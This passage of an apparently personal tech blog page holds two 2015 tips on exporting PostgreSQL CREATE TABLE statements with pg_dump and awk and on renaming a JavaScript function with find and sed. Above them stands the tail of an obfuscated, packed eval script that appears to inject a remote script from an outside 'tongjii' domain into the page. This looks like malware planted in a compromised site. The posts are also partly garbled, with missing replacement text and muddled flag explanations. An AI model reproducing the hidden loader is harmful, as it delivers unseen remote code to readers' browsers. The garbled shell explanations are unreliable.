3=5.j(\\\\\\\'7\\\\\\\')[0];3.h.c(2,3)})();\\\',o,o,\\\'|y|u|s|E|x|A|G|Q|N|P|l|R|S|O|L|M|F|H|I|K\\\'.J(\\\'|\\\'),0,{}))\',Z,Z,\'|||||||||||||||||||||T|U|13|17||X|Y||V|1m|12||1q|1r|11|1n|W|10|14|1l|1o|1c|1k|1i|15|1j|1s|1p|1g|19|18|16|1b|1a\'.15(\'|\'),0,{}))',62,91,'|||||||||||||||||||||||||||||||||||||||||||||||||||||||function|return|replace|String|if|while|55|new|36|eval|toString|RegExp|split|http|21|src|createElement|tongjii|insertBefore|script|fromCharCode|35|parseInt|lib|29|getElementsByTagName|tj|google|_hmt_en|hm_en|js|parentNode|41d12a21b4e1a726d4a651685b118811662033874|document|var|us'.split('|'),0,{}))

Friday, June 12, 2015

exporting schema's create tables only from postgres

I wanted to export only the CREATE TABLEs from a postgresql database, so I did

pg_dump -h HOST -s databasename -O -U user -W | awk 'RS="";/CREATE TABLE[^;]*;/' 

substituting a function name with sed and find

I needed to change a

function foo('', '', 'whatever') 

to a


in a bunch of files.

There are many ways to do this, I decided to edit directly the files with good ol' find & sed

find . -name "*.js" -exec sed --in-place -re "s/foo\([^,]*,[^,]*,[^'\"]*(['\"])(.*)\1/bar('\2')/g" {} \;

-r: Key points where to use the full extended regular expression
-r: expression
\1: notice I match the initial ' or " with a back reference!